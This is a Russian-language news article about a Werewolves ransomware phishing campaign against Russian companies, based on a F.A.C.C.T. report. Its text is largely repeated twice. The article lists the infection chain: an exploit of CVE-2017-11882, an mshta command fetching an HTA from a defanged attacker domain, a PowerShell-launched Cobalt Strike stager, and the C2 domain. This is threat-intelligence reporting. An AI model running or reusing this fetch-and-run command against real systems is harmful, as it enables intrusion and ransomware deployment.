Werewolves вновь развернула масштабную атаку на российские компании
NewsMakerПромышленность, IT и финансы под прицелом: F.A.C.C.T. предупреждает о новой кампании вымогателей.
Эксперты по кибербезопасности из компании F.A.C.C.T. Threat Intelligence зафиксировали новую волну вредоносных рассылок от известной хакерской группы Werewolves. На этот раз злоумышленники нацелились на российские промышленные предприятия, телекоммуникационные и IT-компании, а также финансовые и страховые организации.
Согласно данным специалистов, вымогатели создали поддельный сайт крупного российского производителя спецтехники, скопировав содержимое оригинального портала с помощью программы HTTrack Website Copier. Затем киберпреступники разослали письма с темами «Досудебная претензия» и «Рекламация», содержащие вредоносные вложения, загружающие Cobalt Strike Beacon.
Атака осуществлялась следующим образом:
Отличительной чертой группировки является применение техники двойного давления: помимо вымогательства за расшифровку данных, они публикуют информацию о тех, кто отказался платить выкуп, на своем сайте.
В апреле текущего года вымогатели уже проводили массовые рассылки на темы весеннего призыва и досудебных претензий.
Эксперты по кибербезопасности из компании F.A.C.C.T. Threat Intelligence зафиксировали новую волну вредоносных рассылок от известной хакерской группы Werewolves. На этот раз злоумышленники нацелились на российские промышленные предприятия, телекоммуникационные и IT-компании, а также финансовые и страховые организации.
Согласно данным специалистов, вымогатели создали поддельный сайт крупного российского производителя спецтехники, скопировав содержимое оригинального портала с помощью программы HTTrack Website Copier. Затем киберпреступники разослали письма с темами «Досудебная претензия» и «Рекламация», содержащие вредоносные вложения, загружающие Cobalt Strike Beacon.
Атака осуществлялась следующим образом:
- Жертва открывает вложенный документ «Рекламация.doc» (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), который загружает RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
- На устройство загружается HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
- HTA-файл выполняет команду PowerShell, распаковывающую и запускающую шелл-код Cobalt Strike Stager.
- Stager загружает Cobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.
Отличительной чертой группировки является применение техники двойного давления: помимо вымогательства за расшифровку данных, они публикуют информацию о тех, кто отказался платить выкуп, на своем сайте.
В апреле текущего года вымогатели уже проводили массовые рассылки на темы весеннего призыва и досудебных претензий.